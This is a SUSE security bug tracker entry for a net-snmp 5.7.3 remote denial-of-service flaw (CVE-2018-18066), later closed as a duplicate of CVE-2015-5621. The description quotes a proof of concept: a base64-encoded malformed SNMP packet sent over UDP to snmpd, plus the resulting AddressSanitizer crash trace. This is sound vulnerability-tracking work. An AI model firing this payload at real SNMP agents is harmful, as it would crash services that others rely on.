Bug 1111123 - (CVE-2018-18066) VUL-0: CVE-2018-18066: net-snmp: remote DoS (snmp_oid_compare)
(CVE-2018-18066)
VUL-0: CVE-2018-18066: net-snmp: remote DoS (snmp_oid_compare)
Status: RESOLVED INVALID
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Alexander Bergmann
Security Team bot
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2018-10-08 21:55 UTC by Alexander Bergmann
Modified: 2018-10-12 09:49 UTC (History)
1 user (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Alexander Bergmann 2018-10-08 21:55:23 UTC
https://dumpco.re/blog/net-snmp-5.7.3-remote-dos

VULN#1 CVE-2018-18066
=====================

First bug is remotely exploitable without knowledge of the community string, and leads to Denial of Service:

  # echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111

  # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
  ASAN:SIGSEGV
  =================================================================
  ==41810==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007f261b bp 0x7fff34754550 sp 0x7fff34754220 T0)
      #0 0x7f261a in snmp_oid_compare /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470:13
      #1 0x7f261a in _snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4247
      #2 0x7f261a in snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4336
      #3 0x7f261a in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5241
      #4 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
      #5 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
      #6 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
      #7 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
      #8 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
      #9 0x7f2561efeb44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
      #10 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)

  AddressSanitizer can not provide additional info.
  SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470 snmp_oid_compare
  ==41810==ABORTING
Comment 2 Alexander Bergmann 2018-10-08 22:09:48 UTC
This issue was fixed already in bsc#940188.

https://nvd.nist.gov/vuln/detail/CVE-2015-5621
Comment 3 Alexander Bergmann 2018-10-12 09:49:30 UTC
Researcher contacted MITRE that CVE-2018-18066 is duplicated.

Closing as invalid.